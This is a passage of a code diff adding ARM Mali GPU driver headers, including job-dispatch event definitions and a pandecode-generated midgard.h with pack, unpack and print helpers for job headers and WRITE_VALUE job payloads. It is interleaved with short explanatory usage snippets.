     1141 + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF,
     1142 + 
     1143 + BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT |
     1144 + BASE_JD_SW_EVENT_KERNEL | 0x000,
     1145 + BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT |
     1146 + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000,
     1147 + BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT |
     1148 + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001,
     1149 + 
     1150 + BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT |
     1151 + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF
     1152 +};
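
The bit layout and range conventions documented above translate directly into simple checks on an event code. A minimal sketch (hypothetical helpers, relying only on the BASE_JD_SW_EVENT* flags and range markers defined in this header):

```
/* Classify a reported event code using the documented bit layout. */
static int jd_event_is_sw(enum base_jd_event_code code)
{
	return (code & BASE_JD_SW_EVENT) != 0;          /* bit 14: SW event */
}

static int jd_event_is_sw_success(enum base_jd_event_code code)
{
	/* Bit 13 (SW success) is only meaningful when bit 14 (SW event) is set. */
	return (code & (BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS)) ==
	       (BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS);
}

static int jd_event_is_kernel_only(enum base_jd_event_code code)
{
	/* Range test follows the START <= code < END convention above. */
	return code >= BASE_JD_EVENT_RANGE_KERNEL_ONLY_START &&
	       code < BASE_JD_EVENT_RANGE_KERNEL_ONLY_END;
}
```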
     1153 + 
     1154 +/**
     1155 + * struct base_jd_event_v2 - Event reporting structure
     1156 + *
     1157 + * @event_code: event code.
     1158 + * @atom_number: the atom number that has completed.
     1159 + * @udata: user data.
     1160 + *
     1161 + * This structure is used by the kernel driver to report information
     1162 + * about GPU events. They can either be HW-specific events or low-level
     1163 + * SW events, such as job-chain completion.
     1164 + *
     1165 + * The event code contains an event type field which can be extracted
     1166 + * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK.
     1167 + */
     1168 +struct base_jd_event_v2 {
     1169 + enum base_jd_event_code event_code;
     1170 + base_atom_id atom_number;
     1171 + struct base_jd_udata udata;
     1172 +};
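
As the comment notes, the type field of an event can be recovered by masking with BASE_JD_SW_EVENT_TYPE_MASK. A minimal sketch of how a user-space listener might print a reported event (the helper name is illustrative):

```
#include <stdio.h>

/* Print the atom number, raw code and type field of one reported event. */
static void dump_event(const struct base_jd_event_v2 *ev)
{
	unsigned int type = ev->event_code & BASE_JD_SW_EVENT_TYPE_MASK;

	printf("atom %u: event 0x%x, type 0x%x\n",
	       (unsigned int)ev->atom_number, (unsigned int)ev->event_code, type);
}
```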
     1173 + 
     1174 +/**
     1175 + * struct base_dump_cpu_gpu_counters - Structure for
     1176 + * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS
     1177 + * jobs.
     1178 + * @system_time: gpu timestamp
     1179 + * @cycle_counter: gpu cycle count
     1180 + * @sec: cpu time(sec)
     1181 + * @usec: cpu time(usec)
     1182 + * @padding: padding
     1183 + *
     1184 + * This structure is stored into the memory pointed to by the @jc field
     1185 + * of &struct base_jd_atom.
     1186 + *
     1187 + * It must not occupy the same CPU cache line(s) as any neighboring data.
     1188 + * This is to avoid cases where access to pages containing the structure
     1189 + * is shared between cached and un-cached memory regions, which would
     1190 + * cause memory corruption.
     1191 + */
     1192 + 
     1193 +struct base_dump_cpu_gpu_counters {
     1194 + __u64 system_time;
     1195 + __u64 cycle_counter;
     1196 + __u64 sec;
     1197 + __u32 usec;
     1198 + __u8 padding[36];
     1199 +};
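
The cache-line isolation requirement above is easiest to satisfy by giving the structure its own aligned allocation, padded to whole cache lines. A minimal sketch, assuming a 64-byte cache line (the constant and helper are illustrative, not part of the driver API):

```
#include <stdlib.h>
#include <string.h>

#define CPU_CACHE_LINE 64 /* assumption: query the real line size on the target */

/* Allocate a counters block that shares no cache line with other data. */
static struct base_dump_cpu_gpu_counters *alloc_counters(void)
{
	size_t sz = sizeof(struct base_dump_cpu_gpu_counters);
	size_t rounded = (sz + CPU_CACHE_LINE - 1) & ~(size_t)(CPU_CACHE_LINE - 1);
	struct base_dump_cpu_gpu_counters *p = aligned_alloc(CPU_CACHE_LINE, rounded);

	if (p)
		memset(p, 0, rounded);
	return p;
}
```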
     1200 + 
     1201 +#endif /* _UAPI_BASE_JM_KERNEL_H_ */
     1202 + 
     1203 + 
  • ■ ■ ■ ■ ■ ■
    midgard.h
     1 +#ifndef MIDGARD_H
     2 +#define MIDGARD_H
     3 + 
     4 +//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
     5 + 
     6 +#include <stdio.h>
     7 +#include <stdint.h>
     8 +#include <stdbool.h>
     9 +#include <assert.h>
     10 +#include <math.h>
     11 +#include <inttypes.h>
     12 +#include <string.h>
     13 + 
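/*
 * pan_section_ptr: pointer to section S of descriptor A inside @base.
 * pan_section_pack: single-iteration for-loop that exposes a section struct
 * (seeded with its default _header value) as @name and packs it into @dst
 * when the loop body finishes.
 */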
     14 +#define pan_section_ptr(base, A, S) \
     15 + ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET))
     16 + 
     17 +#define pan_section_pack(dst, A, S, name) \
     18 + for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \
     19 + *_loop_terminate = (void *) (dst); \
     20 + __builtin_expect(_loop_terminate != NULL, 1); \
     21 + ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \
     22 + _loop_terminate = NULL; }))
     23 + 
     24 + 
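/* Shift @v into bit position @start; asserts that it fits in bits [start, end]. */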
     25 +static inline uint64_t
     26 +__gen_uint(uint64_t v, uint32_t start, uint32_t end)
     27 +{
     28 +#ifndef NDEBUG
     29 + const int width = end - start + 1;
     30 + if (width < 64) {
     31 + const uint64_t max = (1ull << width) - 1;
     32 + assert(v <= max);
     33 + }
     34 +#endif
     35 + 
     36 + return v << start;
     37 +}
     38 + 
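/* Read the little-endian bit range [start, end] out of the byte stream @cl. */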
     39 +static inline uint64_t
     40 +__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
     41 +{
     42 + uint64_t val = 0;
     43 + const int width = end - start + 1;
     44 + const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 );
     45 + 
     46 + for (int byte = start / 8; byte <= end / 8; byte++) {
     47 + val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8);
     48 + }
     49 + 
     50 + return (val >> (start % 8)) & mask;
     51 +}
     52 + 
     53 +enum mali_job_type {
     54 + MALI_JOB_TYPE_NOT_STARTED = 0,
     55 + MALI_JOB_TYPE_NULL = 1,
     56 + MALI_JOB_TYPE_WRITE_VALUE = 2,
     57 + MALI_JOB_TYPE_CACHE_FLUSH = 3,
     58 + MALI_JOB_TYPE_COMPUTE = 4,
     59 + MALI_JOB_TYPE_VERTEX = 5,
     60 + MALI_JOB_TYPE_GEOMETRY = 6,
     61 + MALI_JOB_TYPE_TILER = 7,
     62 + MALI_JOB_TYPE_FUSED = 8,
     63 + MALI_JOB_TYPE_FRAGMENT = 9,
     64 +};
     65 + 
     66 +enum mali_write_value_type {
     67 + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
     68 + MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2,
     69 + MALI_WRITE_VALUE_TYPE_ZERO = 3,
     70 + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
     71 + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
     72 + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
     73 + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
     74 +};
     75 + 
     76 + 
     77 +struct MALI_WRITE_VALUE_JOB_PAYLOAD {
     78 + uint64_t address;
     79 + enum mali_write_value_type type;
     80 + uint64_t immediate_value;
     81 +};
     82 + 
     83 +struct MALI_JOB_HEADER {
     84 + uint32_t exception_status;
     85 + uint32_t first_incomplete_task;
     86 + uint64_t fault_pointer;
     87 + bool is_64b;
     88 + enum mali_job_type type;
     89 + bool barrier;
     90 + bool invalidate_cache;
     91 + bool suppress_prefetch;
     92 + bool enable_texture_mapper;
     93 + bool relax_dependency_1;
     94 + bool relax_dependency_2;
     95 + uint32_t index;
     96 + uint32_t dependency_1;
     97 + uint32_t dependency_2;
     98 + uint64_t next;
     99 +};
     100 + 
     101 + 
     102 +static inline void
     103 +MALI_JOB_HEADER_pack(uint32_t * restrict cl,
     104 + const struct MALI_JOB_HEADER * restrict values)
     105 +{
     106 + cl[ 0] = __gen_uint(values->exception_status, 0, 31);
     107 + cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31);
     108 + cl[ 2] = __gen_uint(values->fault_pointer, 0, 63);
     109 + cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32;
     110 + cl[ 4] = __gen_uint(values->is_64b, 0, 0) |
     111 + __gen_uint(values->type, 1, 7) |
     112 + __gen_uint(values->barrier, 8, 8) |
     113 + __gen_uint(values->invalidate_cache, 9, 9) |
     114 + __gen_uint(values->suppress_prefetch, 11, 11) |
     115 + __gen_uint(values->enable_texture_mapper, 12, 12) |
     116 + __gen_uint(values->relax_dependency_1, 14, 14) |
     117 + __gen_uint(values->relax_dependency_2, 15, 15) |
     118 + __gen_uint(values->index, 16, 31);
     119 + cl[ 5] = __gen_uint(values->dependency_1, 0, 15) |
     120 + __gen_uint(values->dependency_2, 16, 31);
     121 + cl[ 6] = __gen_uint(values->next, 0, 63);
     122 + cl[ 7] = __gen_uint(values->next, 0, 63) >> 32;
     123 +}
     124 + 
     125 + 
     126 +#define MALI_JOB_HEADER_LENGTH 32
     127 +struct mali_job_header_packed { uint32_t opaque[8]; };
     128 +static inline void
     129 +MALI_JOB_HEADER_unpack(const uint8_t * restrict cl,
     130 + struct MALI_JOB_HEADER * restrict values)
     131 +{
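 /* Bits 10 and 13 of word 4 are reserved; warn if either is set. */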
     132 + if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n");
     133 + values->exception_status = __gen_unpack_uint(cl, 0, 31);
     134 + values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63);
     135 + values->fault_pointer = __gen_unpack_uint(cl, 64, 127);
     136 + values->is_64b = __gen_unpack_uint(cl, 128, 128);
     137 + values->type = __gen_unpack_uint(cl, 129, 135);
     138 + values->barrier = __gen_unpack_uint(cl, 136, 136);
     139 + values->invalidate_cache = __gen_unpack_uint(cl, 137, 137);
     140 + values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139);
     141 + values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140);
     142 + values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142);
     143 + values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143);
     144 + values->index = __gen_unpack_uint(cl, 144, 159);
     145 + values->dependency_1 = __gen_unpack_uint(cl, 160, 175);
     146 + values->dependency_2 = __gen_unpack_uint(cl, 176, 191);
     147 + values->next = __gen_unpack_uint(cl, 192, 255);
     148 +}
     149 + 
     150 +static inline const char *
     151 +mali_job_type_as_str(enum mali_job_type imm)
     152 +{
     153 + switch (imm) {
     154 + case MALI_JOB_TYPE_NOT_STARTED: return "Not started";
     155 + case MALI_JOB_TYPE_NULL: return "Null";
     156 + case MALI_JOB_TYPE_WRITE_VALUE: return "Write value";
     157 + case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush";
     158 + case MALI_JOB_TYPE_COMPUTE: return "Compute";
     159 + case MALI_JOB_TYPE_VERTEX: return "Vertex";
     160 + case MALI_JOB_TYPE_GEOMETRY: return "Geometry";
     161 + case MALI_JOB_TYPE_TILER: return "Tiler";
     162 + case MALI_JOB_TYPE_FUSED: return "Fused";
     163 + case MALI_JOB_TYPE_FRAGMENT: return "Fragment";
     164 + default: return "XXX: INVALID";
     165 + }
     166 +}
     167 + 
     168 +static inline void
     169 +MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent)
     170 +{
     171 + fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status);
     172 + fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task);
     173 + fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer);
     174 + fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false");
     175 + fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type));
     176 + fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false");
     177 + fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false");
     178 + fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false");
     179 + fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false");
     180 + fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false");
     181 + fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false");
     182 + fprintf(fp, "%*sIndex: %u\n", indent, "", values->index);
     183 + fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1);
     184 + fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2);
     185 + fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next);
     186 +}
     187 + 
     188 +static inline void
     189 +MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl,
     190 + const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
     191 +{
     192 + cl[ 0] = __gen_uint(values->address, 0, 63);
     193 + cl[ 1] = __gen_uint(values->address, 0, 63) >> 32;
     194 + cl[ 2] = __gen_uint(values->type, 0, 31);
     195 + cl[ 3] = 0;
     196 + cl[ 4] = __gen_uint(values->immediate_value, 0, 63);
     197 + cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32;
     198 +}
     199 + 
     200 + 
     201 +#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24
     202 +#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0
     203 + 
     204 + 
     205 +struct mali_write_value_job_payload_packed { uint32_t opaque[6]; };
     206 +static inline void
     207 +MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl,
     208 + struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
     209 +{
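 /* Word 3 is padding and should be zero; warn if not. */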
     210 + if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n");
     211 + values->address = __gen_unpack_uint(cl, 0, 63);
     212 + values->type = __gen_unpack_uint(cl, 64, 95);
     213 + values->immediate_value = __gen_unpack_uint(cl, 128, 191);
     214 +}
     215 + 
     216 +static inline const char *
     217 +mali_write_value_type_as_str(enum mali_write_value_type imm)
     218 +{
     219 + switch (imm) {
     220 + case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter";
     221 + case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp";
     222 + case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero";
     223 + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8";
     224 + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16";
     225 + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32";
     226 + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64";
     227 + default: return "XXX: INVALID";
     228 + }
     229 +}
     230 + 
     231 +static inline void
     232 +MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent)
     233 +{
     234 + fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address);
     235 + fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type));
     236 + fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value);
     237 +}
     238 + 
     239 +struct mali_write_value_job_packed {
     240 + uint32_t opaque[14];
     241 +};
     242 + 
     243 +#define MALI_JOB_HEADER_header \
     244 + .is_64b = true
     245 + 
     246 +#define MALI_WRITE_VALUE_JOB_LENGTH 56
     247 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER
     248 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header
     249 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack
     250 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack
     251 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print
     252 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0
     253 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD
     254 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header
     255 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack
     256 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack
     257 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print
     258 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32
     259 + 
     260 +#endif
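
For reference, the section definitions above are what make pan_section_pack usable for this job type: they name each section's struct type, default header, pack routine and byte offset. A minimal sketch of building a WRITE_VALUE job descriptor with these helpers (the destination buffer, target GPU address and function name are illustrative):

```
#include <stdint.h>
#include <string.h>
#include "midgard.h"

/* Emit one WRITE_VALUE job that stores a 64-bit immediate at target_va. */
static void build_write_value_job(void *dst, uint64_t target_va, uint64_t value)
{
	memset(dst, 0, MALI_WRITE_VALUE_JOB_LENGTH);

	pan_section_pack(dst, WRITE_VALUE_JOB, HEADER, hdr) {
		hdr.type = MALI_JOB_TYPE_WRITE_VALUE;
		hdr.index = 1; /* arbitrary non-zero job index */
	}

	pan_section_pack(dst, WRITE_VALUE_JOB, PAYLOAD, payload) {
		payload.type = MALI_WRITE_VALUE_TYPE_IMMEDIATE_64;
		payload.address = target_va;
		payload.immediate_value = value;
	}
}
```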
     261 + 